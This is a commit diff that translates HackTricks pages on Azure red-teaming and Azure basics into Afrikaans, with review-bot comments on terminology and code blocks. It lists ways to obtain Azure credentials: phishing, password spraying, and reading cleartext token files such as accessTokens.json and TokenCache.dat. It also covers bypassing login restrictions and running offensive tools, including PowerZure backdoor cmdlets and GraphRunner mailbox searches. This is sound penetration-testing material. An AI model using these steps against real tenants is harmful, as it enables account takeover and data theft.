Translated ['src/README.md', 'src/banners/hacktricks-training.md', 'src/

Translator
2024-12-31 20:29:08 +00:00
parent 2753c75e8b
commit 396dbafaf2
245 changed files with 9878 additions and 12609 deletions

@@ -2,86 +2,85 @@
{{#include ../../banners/hacktricks-training.md}}
## Basic Information
## Basiese Inligting
{{#ref}}
az-basic-information/
{{#endref}}
## Azure Pentester/Red Team Methodology
## Azure Pentester/Red Team Metodologie
In order to audit an AZURE environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal Azure services and **external services** connected.
Om 'n AZURE omgewing te oudit, is dit baie belangrik om te weet: watter **dienste gebruik word**, wat is **blootgestel**, wie het **toegang** tot wat, en hoe is interne Azure dienste en **eksterne dienste** gekoppel.
From a Red Team point of view, the **first step to compromise an Azure environment** is to manage to obtain some **credentials** for Azure AD. Here you have some ideas on how to do that:
Vanuit 'n Red Team perspektief, is die **eerste stap om 'n Azure omgewing te kompromitteer** om daarin te slaag om 'n paar **bewyse** vir Azure AD te verkry. Hier is 'n paar idees oor hoe om dit te doen:
- **Leaks** in github (or similar) - OSINT
- **Social** Engineering
- **Password** reuse (password leaks)
- Vulnerabilities in Azure-Hosted Applications
- [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint
- **Local File Read**
- `/home/USERNAME/.azure`
- `C:\Users\USERNAME\.azure`
- The file **`accessTokens.json`** in `az cli` before 2.30 - Jan2022 - stored **access tokens in clear text**
- The file **`azureProfile.json`** contains **info** about logged user.
- **`az logout`** removes the token.
- Older versions of **`Az PowerShell`** stored **access tokens** in **clear** text in **`TokenCache.dat`**. It also stores **ServicePrincipalSecret** in **clear**-text in **`AzureRmContext.json`**. The cmdlet **`Save-AzContext`** can be used to **store** **tokens**.\
Use `Disconnect-AzAccount` to remove them.
- 3rd parties **breached**
- **Internal** Employee
- [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or Oauth App)
- [Device Code Authentication Phishing](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
- [Azure **Password Spraying**](az-unauthenticated-enum-and-initial-entry/az-password-spraying.md)
- **Lekke** in github (of soortgelyk) - OSINT
- **Sosiale** Ingenieurswese
- **Wagwoord** hergebruik (wagwoordlekke)
- Kwesbaarhede in Azure-gehoste toepassings
- [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) met toegang tot metadata-eindpunt
- **Plaaslike Lêer Lees**
- `/home/USERNAME/.azure`
- `C:\Users\USERNAME\.azure`
- Die lêer **`accessTokens.json`** in `az cli` voor 2.30 - Jan2022 - gestoor **toegangstokens in duidelike teks**
- Die lêer **`azureProfile.json`** bevat **inligting** oor die ingelogde gebruiker.
- **`az logout`** verwyder die token.
- Ou weergawe van **`Az PowerShell`** het **toegangstokens** in **duidelike** teks in **`TokenCache.dat`** gestoor. Dit stoor ook **ServicePrincipalSecret** in **duidelike** teks in **`AzureRmContext.json`**. Die cmdlet **`Save-AzContext`** kan gebruik word om **tokens** te **stoor**.\
Gebruik `Disconnect-AzAccount` om hulle te verwyder.
- 3de partye **gekompromitteer**
- **Interne** Werknemer
- [**Algemene Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (bewyse of Oauth App)
- [Toestelkode Verifikasie Phishing](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
- [Azure **Wagwoord Spuit**](az-unauthenticated-enum-and-initial-entry/az-password-spraying.md)
Even if you **haven't compromised any user** inside the Azure tenant you are attacking, you can **gather some information** from it:
Selfs as jy **nie enige gebruiker** binne die Azure tenant wat jy aanval, gecompromitteer het nie, kan jy **'n paar inligting** daaruit versamel:
{{#ref}}
az-unauthenticated-enum-and-initial-entry/
{{#endref}}
> [!NOTE]
> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration:
> Nadat jy daarin geslaag het om bewese te verkry, moet jy weet **aan wie behoort daardie bewese**, en **waartoe hulle toegang het**, so jy moet 'n paar basiese enumerasie uitvoer:
## Basic Enumeration
## Basiese Enumerasie
> [!NOTE]
> Remember that the **noisiest** part of the enumeration is the **login**, not the enumeration itself.
> Onthou dat die **luidste** deel van die enumerasie die **inlog** is, nie die enumerasie self nie.
### SSRF
If you found a SSRF in a machine inside Azure check this page for tricks:
As jy 'n SSRF in 'n masjien binne Azure gevind het, kyk hierdie bladsy vir truuks:
{{#ref}}
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
{{#endref}}
### Bypass Login Conditions
### Bypass Inlog Voorwaardes
<figure><img src="../../images/image (268).png" alt=""><figcaption></figcaption></figure>
In cases where you have some valid credentials but you cannot login, these are some common protections that could be in place:
In gevalle waar jy 'n paar geldige bewese het maar jy kan nie inlog nie, is dit 'n paar algemene beskermings wat in plek kan wees:
- **IP whitelisting** -- You need to compromise a valid IP
- **Geo restrictions** -- Find where the user lives or where are the offices of the company and get a IP from the same city (or contry at least)
- **Browser** -- Maybe only a browser from certain OS (Windows, Linux, Mac, Android, iOS) is allowed. Find out which OS the victim/company uses.
- You can also try to **compromise Service Principal credentials** as they usually are less limited and its login is less reviewed
- **IP witlys** -- Jy moet 'n geldige IP kompromitteer
- **Geo beperkings** -- Vind waar die gebruiker woon of waar die kantore van die maatskappy is en kry 'n IP van dieselfde stad (of land ten minste)
- **Blaaier** -- Miskien is slegs 'n blaaier van sekere OS (Windows, Linux, Mac, Android, iOS) toegelaat. Vind uit watter OS die slagoffer/maatskappy gebruik.
- Jy kan ook probeer om **Service Principal bewese** te kompromitteer aangesien hulle gewoonlik minder beperk is en hul inlog minder nagegaan word.
After bypassing it, you might be able to get back to your initial setup and you will still have access.
Nadat jy dit omseil het, mag jy in staat wees om terug te keer na jou aanvanklike opstelling en jy sal steeds toegang hê.
### Subdomain Takeover
### Subdomein Oorname
- [https://godiego.co/posts/STO-Azure/](https://godiego.co/posts/STO-Azure/)
### Whoami
> [!CAUTION]
> Learn **how to install** az cli, AzureAD and Az PowerShell in the [**Az - Entra ID**](az-services/az-azuread.md) section.
> Leer **hoe om** az cli, AzureAD en Az PowerShell in die [**Az - Entra ID**](az-services/az-azuread.md) afdeling te installeer.
One of the first things you need to know is **who you are** (in which environment you are):
Een van die eerste dinge wat jy moet weet is **wie jy is** (in watter omgewing jy is):
{{#tabs }}
{{#tab name="az cli" }}
```bash
az account list
az account tenant list # Current tenant info
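Review bot: "credentials" is rendered as "bewyse" throughout this hunk (the Azure AD paragraph, the Common Phishing bullet, the NOTE about whose creds they are, the Bypass Login Conditions paragraph and the Service Principal bullet); "bewyse" reads as "evidence/proof", so a reader looking for login credentials will miss the point. Suggest one consistent term such as "aanmeldbewyse", or keeping "credentials" untranslated the way "Service Principal", "tenant" and "Red Team" are kept. Two smaller points in the same hunk: "Older versions of Az PowerShell" became the singular "Ou weergawe", and the first paragraph still says "Azure AD" while the Whoami CAUTION below points at "Az - Entra ID", so the naming is worth aligning in this pass.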
@@ -90,22 +89,18 @@ az ad signed-in-user show # Current signed-in user
az ad signed-in-user list-owned-objects # Get owned objects by current user
az account management-group list #Not allowed by default
```
{{#endtab }}
{{#tab name="AzureAD" }}
```powershell
#Get the current session state
Get-AzureADCurrentSessionInfo
#Get details of the current tenant
Get-AzureADTenantDetail
```
{{#endtab }}
{{#tab name="Az PowerShell" }}
```powershell
# Get the information about the current context (Account, Tenant, Subscription etc.)
Get-AzContext
@@ -121,53 +116,49 @@ Get-AzResource
Get-AzRoleAssignment # For all users
Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com # For current user
```
{{#endtab }}
{{#endtabs }}
> [!CAUTION]
> Oone of the most important commands to enumerate Azure is **`Get-AzResource`** from Az PowerShell as it lets you **know the resources your current user has visibility over**.
> Een van die belangrikste opdragte om Azure te enumerate is **`Get-AzResource`** van Az PowerShell, aangesien dit jou **inligting gee oor die hulpbronne wat jou huidige gebruiker kan sien**.
>
> You can get the same info in the **web console** going to [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) or searching for "All resources"
> Jy kan dieselfde inligting in die **webkonsol** kry deur na [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) te gaan of te soek na "Alle hulpbronne"
### ENtra ID Enumeration
By default, any user should have **enough permissions to enumerate** things such us, users, groups, roles, service principals... (check [default AzureAD permissions](az-basic-information/#default-user-permissions)).\
You can find here a guide:
Standaard behoort enige gebruiker **voldoende regte te hê om** dinge soos gebruikers, groepe, rolle, diensprincipals... te enumerate (kyk [standaard AzureAD regte](az-basic-information/#default-user-permissions)).\
Jy kan hier 'n gids vind:
{{#ref}}
az-services/az-azuread.md
{{#endref}}
> [!NOTE]
> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
> In the following section you can check some ways to **enumerate some common services.**
> Nou dat jy **'n bietjie inligting oor jou akrediteerings het** (en as jy 'n rooi span is, hoop ek jy **is nie opgespoor nie**). Dit is tyd om uit te vind watter dienste in die omgewing gebruik word.\
> In die volgende afdeling kan jy 'n paar maniere kyk om **'n paar algemene dienste te enumerate.**
## App Service SCM
Kudu console to log in to the App Service 'container'.
Kudu-konsol om in te log in die App Service 'houer'.
## Webshell
Use portal.azure.com and select the shell, or use shell.azure.com, for a bash or powershell. The 'disk' of this shell are stored as an image file in a storage-account.
Gebruik portal.azure.com en kies die shell, of gebruik shell.azure.com, vir 'n bash of powershell. Die 'skyf' van hierdie shell word as 'n beeldlêer in 'n stoorrekening gestoor.
## Azure DevOps
Azure DevOps is separate from Azure. It has repositories, pipelines (yaml or release), boards, wiki, and more. Variable Groups are used to store variable values and secrets.
Azure DevOps is apart van Azure. Dit het repositories, pipelines (yaml of release), borde, wiki, en meer. Veranderlike Groepe word gebruik om veranderlike waardes en geheime te stoor.
## Debug | MitM az cli
Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending:
Deur die parameter **`--debug`** te gebruik, is dit moontlik om al die versoeke wat die hulpmiddel **`az`** stuur, te sien:
```bash
az account management-group list --output table --debug
```
In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do:
Om 'n **MitM** na die hulpmiddel te doen en **al die versoeke** wat dit handmatig stuur te kontroleer, kan jy doen:
{{#tabs }}
{{#tab name="Bash" }}
```bash
export ADAL_PYTHON_SSL_NO_VERIFY=1
export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
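Review bot: the headings "### ENtra ID Enumeration", "## App Service SCM", "## Webshell", "## Azure DevOps" and "## Debug | MitM az cli" are left in English in this hunk while "## Basic Enumeration", "### SSRF" and "### Bypass Login Conditions" above were translated, and the "ENtra" capitalisation typo survives in the untranslated heading. Suggest translating these headings too (e.g. "### Entra ID Enumerasie") and correcting "ENtra" to "Entra". The English CAUTION line "Oone of the most important commands" is a typo that the Afrikaans line already fixes; if the English is retained anywhere, fix it there as well.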
@@ -180,25 +171,21 @@ export HTTP_PROXY="http://127.0.0.1:8080"
openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM
export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem
```
{{#endtab }}
{{#tab name="PS" }}
```bash
$env:ADAL_PYTHON_SSL_NO_VERIFY=1
$env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
$env:HTTPS_PROXY="http://127.0.0.1:8080"
$env:HTTP_PROXY="http://127.0.0.1:8080"
```
{{#endtab }}
{{#endtabs }}
## Automated Recon Tools
## Geoutomatiseerde Verkenning Gereedskap
### [**ROADRecon**](https://github.com/dirkjanm/ROADtools)
```powershell
cd ROADTools
pipenv shell
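Review bot: the MitM setup in this hunk mixes `~/Downloads/cacert.der` in the openssl line with the absolute `/Users/user/Downloads/cacert.pem` in `REQUESTS_CA_BUNDLE`; both should point at the same file, so use `~/Downloads/cacert.pem` (or `$HOME/Downloads/cacert.pem`) in the export. The "PS" tab is fenced as ```bash although it contains `$env:` PowerShell syntax, and it has no equivalent of the `REQUESTS_CA_BUNDLE` line; suggest tagging that fence `powershell` and adding the CA bundle step there too.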
@@ -206,9 +193,7 @@ roadrecon auth -u test@corp.onmicrosoft.com -p "Welcome2022!"
roadrecon gather
roadrecon gui
```
### [Monkey365](https://github.com/silverhack/monkey365)
```powershell
Import-Module monkey365
Get-Help Invoke-Monkey365
@@ -216,9 +201,7 @@ Get-Help Invoke-Monkey365 -Detailed
Invoke-Monkey365 -IncludeEntraID -ExportTo HTML -Verbose -Debug -InformationAction Continue
Invoke-Monkey365 - Instance Azure -Analysis All -ExportTo HTML
```
### [**Stormspotter**](https://github.com/Azure/Stormspotter)
```powershell
# Start Backend
cd stormspotter\backend\
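Review bot: `Invoke-Monkey365 - Instance Azure -Analysis All -ExportTo HTML` has a space between the dash and `Instance`, so PowerShell will not parse `-Instance` as a parameter; it should read `Invoke-Monkey365 -Instance Azure -Analysis All -ExportTo HTML`. The hunk carries this over unchanged from the original, so it is worth fixing while the block is being touched.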
@@ -236,9 +219,7 @@ az login -u test@corp.onmicrosoft.com -p Welcome2022!
python stormspotter\stormcollector\sscollector.pyz cli
# This will generate a .zip file to upload in the frontend (127.0.0.1:9091)
```
### [**AzureHound**](https://github.com/BloodHoundAD/AzureHound)
```powershell
# You need to use the Az PowerShell and Azure AD modules:
$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force
@@ -294,9 +275,7 @@ MATCH p=(m:User)-[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContribu
## All Azure AD Groups that are synchronized with On-Premise AD
MATCH (n:Group) WHERE n.objectid CONTAINS 'S-1-5' AND n.azsyncid IS NOT NULL RETURN n
```
### [Azucar](https://github.com/nccgroup/azucar)
```bash
# You should use an account with at least read-permission on the assets you want to access
git clone https://github.com/nccgroup/azucar.git
@@ -309,17 +288,13 @@ PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials
# resolve the TenantID for an specific username
PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com
```
### [**MicroBurst**](https://github.com/NetSPI/MicroBurst)
```
Import-Module .\MicroBurst.psm1
Import-Module .\Get-AzureDomainInfo.ps1
Get-AzureDomainInfo -folder MicroBurst -Verbose
```
### [**PowerZure**](https://github.com/hausec/PowerZure)
```powershell
Connect-AzAccount
ipmo C:\Path\To\Powerzure.psd1
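Review bot: the MicroBurst fence in this hunk has no language tag while every other tool block on the page is tagged (`powershell` or `bash`); tag it `powershell` so the `Import-Module` lines render like the neighbouring blocks. The Azucar block is fenced as ```bash but the lines after `git clone` are PowerShell with a `PS>` prompt; consider `powershell` there too, or split the `git clone` line into its own bash fence.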
@@ -340,9 +315,7 @@ $ Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest
# Administrator
$ Create-Backdoor, Execute-Backdoor
```
### [**GraphRunner**](https://github.com/dafthack/GraphRunner/wiki/Invoke%E2%80%90GraphRunner)
```powershell
#Get-GraphTokens
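Review bot: in the PowerZure block the closing lines carry a `$ ` shell prompt (`$ Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest`, `$ Create-Backdoor, Execute-Backdoor`) inside a ```powershell fence whose opening lines (`Connect-AzAccount`, `ipmo C:\Path\To\Powerzure.psd1`) have none; drop the prompts so the block can be pasted as-is, and note that `Create-Backdoor, Execute-Backdoor` lists two cmdlets rather than one runnable command.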
@@ -398,9 +371,4 @@ Get-TenantID -Domain
#Runs Invoke-GraphRecon, Get-AzureADUsers, Get-SecurityGroups, Invoke-DumpCAPS, Invoke-DumpApps, and then uses the default_detectors.json file to search with Invoke-SearchMailbox, Invoke-SearchSharePointAndOneDrive, and Invoke-SearchTeams.
Invoke-GraphRunner -Tokens $tokens
```
{{#include ../../banners/hacktricks-training.md}}

@@ -1,376 +1,372 @@
# Az - Basic Information
# Az - Basiese Inligting
{{#include ../../../banners/hacktricks-training.md}}
## Organization Hierarchy
## Organisasie Hiërargie
<figure><img src="https://lh7-rt.googleusercontent.com/slidesz/AGV_vUcVrh1BpuQXN7RzGqoxrn-4Nm_sjdJU-dDTvshloB7UMQnN1mtH9N94zNiPCzOYAqE9EsJqlboZOj47tQsQktjxszpKvIDPZLs9rgyiObcZCvl7N0ZWztshR0ZddyBYZIAwPIkrEQ=s2048?key=l3Eei079oPmVJuh8lxQYxxrB" alt=""><figcaption><p><a href="https://www.tunecom.be/stg_ba12f/wp-content/uploads/2020/01/VDC-Governance-ManagementGroups-1536x716.png">https://www.tunecom.be/stg_ba12f/wp-content/uploads/2020/01/VDC-Governance-ManagementGroups-1536x716.png</a></p></figcaption></figure>
### Management Groups
### Bestuursgroepe
- It can contain **other management groups or subscriptions**.
- This allows to **apply governance controls** such as RBAC and Azure Policy once at the management group level and have them **inherited** by all the subscriptions in the group.
- **10,000 management** groups can be supported in a single directory.
- A management group tree can support **up to six levels of depth**. This limit doesnt include the root level or the subscription level.
- Each management group and subscription can support **only one parent**.
- Even if several management groups can be created **there is only 1 root management group**.
- The root management group **contains** all the **other management groups and subscriptions** and **cannot be moved or deleted**.
- All subscriptions within a single management group must trust the **same Entra ID tenant.**
- Dit kan **ander bestuursgroepe of subskripsies** bevat.
- Dit maak dit moontlik om **governance beheer** soos RBAC en Azure-beleid een keer op die bestuursgroepvlak toe te pas en dit **geërf** te laat word deur al die subskripsies in die groep.
- **10,000 bestuurs** groepe kan in 'n enkele gids ondersteun word.
- 'n Bestuursgroepboom kan **tot ses vlakke diepte** ondersteun. Hierdie limiet sluit nie die wortelvlak of die subskripsievlak in nie.
- Elke bestuursgroep en subskripsie kan **slegs een ouer** ondersteun.
- Alhoewel verskeie bestuursgroepe geskep kan word, is daar **slegs 1 wortel bestuursgroep**.
- Die wortel bestuursgroep **bevat** al die **ander bestuursgroepe en subskripsies** en **kan nie verskuif of verwyder** word nie.
- Alle subskripsies binne 'n enkele bestuursgroep moet die **dieselfde Entra ID huur** vertrou.
<figure><img src="../../../images/image (147).png" alt=""><figcaption><p><a href="https://td-mainsite-cdn.tutorialsdojo.com/wp-content/uploads/2023/02/managementgroups-768x474.png">https://td-mainsite-cdn.tutorialsdojo.com/wp-content/uploads/2023/02/managementgroups-768x474.png</a></p></figcaption></figure>
### Azure Subscriptions
### Azure Subskripsies
- Its another **logical container where resources** (VMs, DBs…) can be run and will be billed.
- Its **parent** is always a **management group** (and it can be the root management group) as subscriptions cannot contain other subscriptions.
- It **trust only one Entra ID** directory
- **Permissions** applied at the subscription level (or any of its parents) are **inherited** to all the resources inside the subscription
- Dit is 'n ander **logiese houer waar hulpbronne** (VM's, DB's…) gedra kan word en gefaktureer sal word.
- Sy **ouer** is altyd 'n **bestuursgroep** (en dit kan die wortel bestuursgroep wees) aangesien subskripsies nie ander subskripsies kan bevat nie.
- Dit **vertrou slegs een Entra ID** gids
- **Toestemmings** wat op die subskripsievlak (of enige van sy ouers) toegepas word, word **geërf** na al die hulpbronne binne die subskripsie
### Resource Groups
### Hulpbron Groepe
[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-python?tabs=macos#what-is-a-resource-group) A resource group is a **container** that holds **related resources** for an Azure solution. The resource group can include all the resources for the solution, or only those **resources that you want to manage as a group**. Generally, add **resources** that share the **same lifecycle** to the same resource group so you can easily deploy, update, and delete them as a group.
[Van die dokumentasie:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-python?tabs=macos#what-is-a-resource-group) 'n Hulpbron groep is 'n **houer** wat **verwante hulpbronne** vir 'n Azure-oplossing bevat. Die hulpbron groep kan al die hulpbronne vir die oplossing insluit, of slegs daardie **hulpbronne wat jy as 'n groep wil bestuur**. Oor die algemeen, voeg **hulpbronne** wat die **selfde lewensiklus** deel by die selfde hulpbron groep sodat jy dit maklik kan ontplooi, opdateer, en verwyder as 'n groep.
All the **resources** must be **inside a resource group** and can belong only to a group and if a resource group is deleted, all the resources inside it are also deleted.
Alle **hulpbronne** moet **binne 'n hulpbron groep** wees en kan slegs aan een groep behoort, en as 'n hulpbron groep verwyder word, word al die hulpbronne daarin ook verwyder.
<figure><img src="https://lh7-rt.googleusercontent.com/slidesz/AGV_vUfe8U30iP_vdZCvxX4g8nEPRLoo7v0kmCGkDn1frBPn3_GIoZ7VT2LkdsVQWCnrG_HSYNRRPM-1pSECUkbDAB-9YbUYLzpvKVLDETZS81CHWKYM4fDl3oMo5-yvTMnjdLTS2pz8U67xUTIzBhZ25MFMRkq5koKY=s2048?key=gSyKQr3HTyhvHa28Rf7LVA" alt=""><figcaption><p><a href="https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&#x26;ssl=1">https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&#x26;ssl=1</a></p></figcaption></figure>
### Azure Resource IDs
### Azure Hulpbron ID's
Every resource in Azure has an Azure Resource ID that identifies it.
Elke hulpbron in Azure het 'n Azure Hulpbron ID wat dit identifiseer.
The format of an Azure Resource ID is as follows:
Die formaat van 'n Azure Hulpbron ID is soos volg:
- `/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}`
For a virtual machine named myVM in a resource group `myResourceGroup` under subscription ID `12345678-1234-1234-1234-123456789012`, the Azure Resource ID looks like this:
Vir 'n virtuele masjien genaamd myVM in 'n hulpbron groep `myResourceGroup` onder subskripsie ID `12345678-1234-1234-1234-123456789012`, lyk die Azure Hulpbron ID soos volg:
- `/subscriptions/12345678-1234-1234-1234-123456789012/resourceGroups/myResourceGroup/providers/Microsoft.Compute/virtualMachines/myVM`
## Azure vs Entra ID vs Azure AD Domain Services
## Azure vs Entra ID vs Azure AD Domein Dienste
### Azure
Azure is Microsofts comprehensive **cloud computing platform, offering a wide range of services**, including virtual machines, databases, artificial intelligence, and storage. It acts as the foundation for hosting and managing applications, building scalable infrastructures, and running modern workloads in the cloud. Azure provides tools for developers and IT professionals to create, deploy, and manage applications and services seamlessly, catering to a variety of needs from startups to large enterprises.
Azure is Microsoft se omvattende **cloud computing platform, wat 'n wye reeks dienste bied**, insluitend virtuele masjiene, databasisse, kunsmatige intelligensie, en stoor. Dit dien as die grondslag vir die gasheer en bestuur van toepassings, die bou van skaalbare infrastruktuur, en die uitvoering van moderne werklas in die wolk. Azure bied gereedskap vir ontwikkelaars en IT-professionals om toepassings en dienste naatloos te skep, te ontplooi, en te bestuur, wat voorsien in 'n verskeidenheid behoeftes van startups tot groot ondernemings.
### Entra ID (formerly Azure Active Directory)
### Entra ID (voorheen Azure Aktiewe Gids)
Entra ID is a cloud-based **identity and access management servic**e designed to handle authentication, authorization, and user access control. It powers secure access to Microsoft services such as Office 365, Azure, and many third-party SaaS applications. With features like single sign-on (SSO), multi-factor authentication (MFA), and conditional access policies among others.
Entra ID is 'n wolk-gebaseerde **identiteit en toegang bestuur diens** wat ontwerp is om autentisering, autorisasie, en gebruikers toegang beheer te hanteer. Dit bied veilige toegang tot Microsoft dienste soos Office 365, Azure, en baie derdeparty SaaS toepassings. Met funksies soos enkel teken-in (SSO), multi-faktor autentisering (MFA), en voorwaardelike toegang beleid onder andere.
### Entra Domain Services (formerly Azure AD DS)
### Entra Domein Dienste (voorheen Azure AD DS)
Entra Domain Services extends the capabilities of Entra ID by offering **managed domain services compatible with traditional Windows Active Directory environments**. It supports legacy protocols such as LDAP, Kerberos, and NTLM, allowing organizations to migrate or run older applications in the cloud without deploying on-premises domain controllers. This service also supports Group Policy for centralized management, making it suitable for scenarios where legacy or AD-based workloads need to coexist with modern cloud environments.
Entra Domein Dienste brei die vermoëns van Entra ID uit deur **bestuurde domein dienste aan te bied wat versoenbaar is met tradisionele Windows Aktiewe Gids omgewings**. Dit ondersteun ouer protokolle soos LDAP, Kerberos, en NTLM, wat organisasies in staat stel om ouer toepassings in die wolk te migreer of te laat loop sonder om plaaslike domein kontrollers te ontplooi. Hierdie diens ondersteun ook Groep Beleid vir gesentraliseerde bestuur, wat dit geskik maak vir scenario's waar ouer of AD-gebaseerde werklas saam met moderne wolkomgewings moet bestaan.
## Entra ID Principals
### Users
### Gebruikers
- **New users**
- Indicate email name and domain from selected tenant
- Indicate Display name
- Indicate password
- Indicate properties (first name, job title, contact info…)
- Default user type is “**member**”
- **External users**
- Indicate email to invite and display name (can be a non Microsft email)
- Indicate properties
- Default user type is “**Guest**”
- **Nuwe gebruikers**
- Dui e-pos naam en domein van die geselekteerde huur aan
- Dui Vertoonnaam aan
- Dui wagwoord aan
- Dui eienskappe aan (voornaam, posbeskrywing, kontakbesonderhede…)
- Standaard gebruiker tipe is “**lid**”
- **Buitelandse gebruikers**
- Dui e-pos aan om uit te nooi en vertoonnaam (kan 'n nie-Microsoft e-pos wees)
- Dui eienskappe aan
- Standaard gebruiker tipe is “**Gaste**”
### Members & Guests Default Permissions
### Lede & Gaste Standaard Toestemmings
You can check them in [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) but among other actions a member will be able to:
Jy kan dit nagaan in [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) maar onder andere aksies sal 'n lid in staat wees om:
- Read all users, Groups, Applications, Devices, Roles, Subscriptions, and their public properties
- Invite Guests (_can be turned off_)
- Create Security groups
- Read non-hidden Group memberships
- Add guests to Owned groups
- Create new application (_can be turned off_)
- Add up to 50 devices to Azure (_can be turned off_)
- Lees alle gebruikers, Groepe, Toepassings, Toestelle, Rolle, Subskripsies, en hul publieke eienskappe
- Nooi Gaste (_kan afgeskakel word_)
- Skep Sekuriteitsgroepe
- Lees nie-verborgene Groep lidmaatskappe
- Voeg gaste by Besit groepe
- Skep nuwe toepassing (_kan afgeskakel word_)
- Voeg tot 50 toestelle by Azure (_kan afgeskakel word_)
> [!NOTE]
> Remember that to enumerate Azure resources the user needs an explicit grant of the permission.
> Onthou dat om Azure hulpbronne te tel, die gebruiker 'n eksplisiete toekenning van die toestemming benodig.
### Users Default Configurable Permissions
### Gebruikers Standaard Konfigureerbare Toestemmings
- **Members (**[**docs**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)**
- Register Applications: Default **Yes**
- Restrict non-admin users from creating tenants: Default **No**
- Create security groups: Default **Yes**
- Restrict access to Microsoft Entra administration portal: Default **No**
- This doesnt restrict API access to the portal (only web)
- Allow users to connect work or school account with LinkedIn: Default **Yes**
- Show keep user signed in: Default **Yes**
- Restrict users from recovering the BitLocker key(s) for their owned devices: Default No (check in Device Settings)
- Read other users: Default **Yes** (via Microsoft Graph)
- **Guests**
- **Guest user access restrictions**
- **Guest users have the same access as members** grants all member user permissions to guest users by default.
- **Guest users have limited access to properties and memberships of directory objects (default)** restricts guest access to only their own user profile by default. Access to other users and group information is no longer allowed.
- **Guest user access is restricted to properties and memberships of their own directory objects** is the most restrictive one.
- **Guests can invite**
- **Anyone in the organization can invite guest users including guests and non-admins (most inclusive) - Default**
- **Member users and users assigned to specific admin roles can invite guest users including guests with member permissions**
- **Only users assigned to specific admin roles can invite guest users**
- **No one in the organization can invite guest users including admins (most restrictive)**
- **External user leave**: Default **True**
- Allow external users to leave the organization
- **Lede (**[**dokumente**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)**
- Registreer Toepassings: Standaard **Ja**
- Beperk nie-admin gebruikers van die skep van huurders: Standaard **Nee**
- Skep sekuriteitsgroepe: Standaard **Ja**
- Beperk toegang tot Microsoft Entra administrasie portaal: Standaard **Nee**
- Dit beperk nie API toegang tot die portaal nie (slegs web)
- Laat gebruikers toe om werk of skool rekening met LinkedIn te verbind: Standaard **Ja**
- Toon hou gebruiker ingelog: Standaard **Ja**
- Beperk gebruikers van die herstel van die BitLocker sleutel(s) vir hul besit toestelle: Standaard Nee (kyk in Toestel Instellings)
- Lees ander gebruikers: Standaard **Ja** (deur Microsoft Graph)
- **Gaste**
- **Gaste gebruiker toegang beperkings**
- **Gaste gebruikers het dieselfde toegang as lede** gee alle lid gebruiker toestemmings aan gaste gebruikers per standaard.
- **Gaste gebruikers het beperkte toegang tot eienskappe en lidmaatskappe van gids objekte (standaard)** beperk gaste toegang tot slegs hul eie gebruikersprofiel per standaard. Toegang tot ander gebruikers en groep inligting is nie meer toegelaat nie.
- **Gaste gebruiker toegang is beperk tot eienskappe en lidmaatskappe van hul eie gids objekte** is die mees beperkende een.
- **Gaste kan nooi**
- **Enige iemand in die organisasie kan gaste gebruikers nooi insluitend gaste en nie-admins (mees inklusief) - Standaard**
- **Lid gebruikers en gebruikers wat aan spesifieke admin rolle toegeken is kan gaste gebruikers nooi insluitend gaste met lid toestemmings**
- **Slegs gebruikers wat aan spesifieke admin rolle toegeken is kan gaste gebruikers nooi**
- **Niemand in die organisasie kan gaste gebruikers nooi insluitend admins (mees beperkende)**
- **Buitelandse gebruiker verlaat**: Standaard **Waar**
- Laat buitelandse gebruikers toe om die organisasie te verlaat
> [!TIP]
> Even if restricted by default, users (members and guests) with granted permissions could perform the previous actions.
> Alhoewel dit per standaard beperk is, kan gebruikers (lede en gaste) met toegekenne toestemmings die vorige aksies uitvoer.
### **Groups**
### **Groepe**
There are **2 types of groups**:
Daar is **2 tipes groepe**:
- **Security**: This type of group is used to give members access to aplications, resources and assign licenses. Users, devices, service principals and other groups an be members.
